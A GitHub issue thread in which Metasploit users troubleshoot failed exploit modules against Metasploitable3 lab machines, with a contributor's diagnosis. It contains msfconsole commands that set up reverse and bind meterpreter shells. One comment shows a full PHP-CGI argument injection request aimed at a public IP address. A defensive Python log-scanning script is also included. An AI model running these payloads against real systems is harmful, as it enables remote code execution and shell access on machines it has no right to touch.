Exploit completed, but no session was created #17432

Closed
Individuum92 opened this issue Jan 3, 2023 · 8 comments
Labels: question, Stale

Comments

@Individuum92

Hello,

I am having a problem running a SQL injection against an outdated version of PHP. I am operating from a current Kali Linux with current MSF as operational VM and a metasploitable3 as victim.

I am using the exploit multi/http/php_cgi_arg_injection.
The VMs are mutually pingable. No AntiVir installed. Assigning the options and executing the injection:

msf6 > use exploit/multi/http/php_cgi_arg_injection
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/php_cgi_arg_injection) > set LHOST 192.168.0.23
LHOST => 192.168.0.23
msf6 exploit(multi/http/php_cgi_arg_injection) > set RHOSTS 192.168.0.230
RHOSTS => 192.168.0.230
msf6 exploit(multi/http/php_cgi_arg_injection) > set RPORT 4444
RPORT => 4444
msf6 exploit(multi/http/php_cgi_arg_injection) > run
[*] Started reverse TCP handler on 192.168.0.23:4444 
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/php_cgi_arg_injection) > 

After running the "run" command, the execution hangs for some time at [*] Started reverse TCP handler on 192.168.0.23:4444
Since I don't get an error message, I don't think it's an exploit problem. I have now already tested a few systems.
The Google suggestions were also unsuccessful. This seems to happen more often. Does anyone have an idea?

Metasploit version

Framework: 6.2.31-dev on Kali 2022.04 (was already pre-installed)
Console : 6.2.31-dev

Additional Information

The exploitable VM is metasploitable3 (https://github.com/rapid7/metasploitable3) as .ova imported in Oracle VirtualBox

@bcoles
Contributor

bcoles commented Jan 4, 2023

You can set verbose true to see verbose output, then use the check method to check if the remote host is vulnerable.

You can set HttpTrace true and re-run the module to see the raw HTTP requests and associated responses. This may help you diagnose your issue.

msf6 exploit(multi/http/php_cgi_arg_injection) > set RPORT 4444
RPORT => 4444

Is the remote service running on port 4444?

bcoles added the question label and removed the bug label on Jan 4, 2023
@Individuum92
Author

Thank you for your answer!

Right, the port was not correct. In the Metasploitable environment the following http ports are open and listening:

http 80/tcp
http 80/udp
https 443/tcp
https 443/udp
http-alt 8080/tcp
http-alt 8080/udp

So I tried as LPORT 80 as well as 8080.

I also set the php/meterpreter/bind_tcp payload. Now the output after the run command also looks a bit different.
However, I now get the message:

192.168.0.230 - Meterpreter session 2 closed. Reason: Died

After running the check command I get the following message:
[*] 192.168.0.230:8080 - The target is not exploitable.

This message is quite meaningful ...
The system is not exploitable. Have I made a mistake or is there no valid exploit for this?

I am currently in the process of delving deeper into the subject. After a few days of testing and reading, I can't get any further.
It is correct that the port of the web server is used, isn't it?

Thank you very much for the help!

@Tslr-Anas

Hey, can anyone help me? I have this issue

[*] Started reverse TCP handler on 192.168.2.5:4444

####################

Request:

####################
POST /?--define+allow_url_include%3d1+--define+safe_mode%3d0+--define+suhosin.simulation%3d1+-d+disable_functions%3d%22%22+--define+open_basedir%3dnone+--define+auto_prepend_file%3dphp://input+--define+cgi.force_redirect%3d0+-%64+cgi.redirect_status_env%3d0+--no-php-ini HTTP/1.1
Host: 45.145.227.27
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 1118
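
As an added example (not part of this thread and not Metasploit code): the traced request above carries php-cgi switches in a query string that has no unencoded `=`, and that shape is what a defender can search for in web access logs. The combined log format, the `injected_args` and `scan` names, and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request field of a combined-format access log line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# ini directives that the request quoted in this thread overrides
WATCHED_INI = {"auto_prepend_file", "allow_url_include", "disable_functions",
               "open_basedir", "cgi.force_redirect"}


def injected_args(target):
    """Return the decoded argv a CGI binary would see, or [] if the query is ordinary."""
    _, _, query = target.partition("?")
    # A query is passed as command-line arguments only if it has no unencoded '='.
    if not query or "=" in query:
        return []
    args = [unquote(tok) for tok in query.split("+") if tok]
    # Decode before testing so encoded switches such as -%64 (-d) are still seen.
    return args if any(a.startswith("-") for a in args) else []


def scan(lines):
    """Return (line_number, source_ip, overridden_ini_directives) per suspicious request."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        args = injected_args(match.group("target"))
        if not args:
            continue
        ini = sorted({a.split("=", 1)[0] for a in args if "=" in a} & WATCHED_INI)
        findings.append((number, line.split()[0], ini))
    return findings


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Jan/2023:10:00:01 +0000] "GET /index.php?id=5&page=-d HTTP/1.1" 200 512',
    '203.0.113.9 - - [03/Jan/2023:10:00:02 +0000] "POST /?--define+allow_url_include%3d1'
    '+-%64+auto_prepend_file%3dphp://input+--no-php-ini HTTP/1.1" 200 0',
    '203.0.113.9 - - [03/Jan/2023:10:00:03 +0000] "GET /index.php?-s HTTP/1.1" 200 2048',
    '203.0.113.4 - - [03/Jan/2023:10:00:04 +0000] "GET /search?q+a HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for number, source, ini in scan(SAMPLE_LOG):
        print(f"line {number}: {source} php-cgi style arguments, ini overrides: {ini}")
```

The first sample line is not flagged because its query contains a raw `=`, and the last is not flagged because none of its decoded tokens is a switch.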

@github-actions

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions bot added the Stale label on Feb 27, 2023
@bcoles
Contributor

bcoles commented Mar 19, 2023

> So I tried as LPORT 80 as well as 8080.
>
> I also set the php/meterpreter/bind_tcp payload. Now the output after the run command also looks a bit different. However, I now get the message:
>
> 192.168.0.230 - Meterpreter session 2 closed. Reason: Died

bind payloads create a bindshell (if successful). If you have set lport to 80 (or 8080), then Metasploit will try to connect to the remote host (rhost) on lport (port 80 or 8080). As per your nmap output above, these ports are already open and already have services listening. Metasploit will try to establish a session with these existing services which is obviously doomed to failure.

> After running the check command I get the following message: [*] 192.168.0.230:8080 - The target is not exploitable.
>
> This message is quite meaningful ... The system is not exploitable. Have I made a mistake or is there no valid exploit for this?

It is not clear what you are trying to exploit, or how you're trying to exploit it, or why.

The original post talks about "SQL injection" then proceeds to talk about an unrelated command argument injection in PHP when run as CGI.

This vulnerability is a decade old. You should verify whether Metasploitable3 is vulnerable to this issue.

You can set verbose true to see verbose output, then use the check method to check if the remote host is vulnerable.

You can set HttpTrace true and re-run the module to see the raw HTTP requests and associated responses. This may help you diagnose your issue.


This issue was abandoned more than 2 months ago. Closing.

bcoles closed this as completed on Mar 19, 2023
@bcoles
Contributor

bcoles commented Mar 27, 2023

> After running the check command I get the following message: [*] 192.168.0.230:8080 - The target is not exploitable.
>
> This message is quite meaningful ... The system is not exploitable. Have I made a mistake or is there no valid exploit for this?

There was a bug in the check method (#17822). check returned false negatives if the disclosed source code did not include <?. Fixed in #17823.

@bingo1199

This comment was marked as off-topic.

@jonnyfrez81

Any info on this? I have the same problem. It feels like I have tried everything. Updated the meta, changed the network on the VB connection. Worked through a lot of different ports but still I get the same result:

msf6 exploit(multi/misc/java_rmi_server) > set LPORT 80
LPORT => 80
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.0.88:80
[*] 192.168.0.89:1099 - Using URL: http://192.168.0.88:8080/8rFNYm90iP
[*] 192.168.0.89:1099 - Server started.
[-] 192.168.0.89:1099 - Exploit failed: RuntimeError The connection with (192.168.0.89:1099) timed out.
[*] 192.168.0.89:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) > sessions

Active sessions

No active sessions.
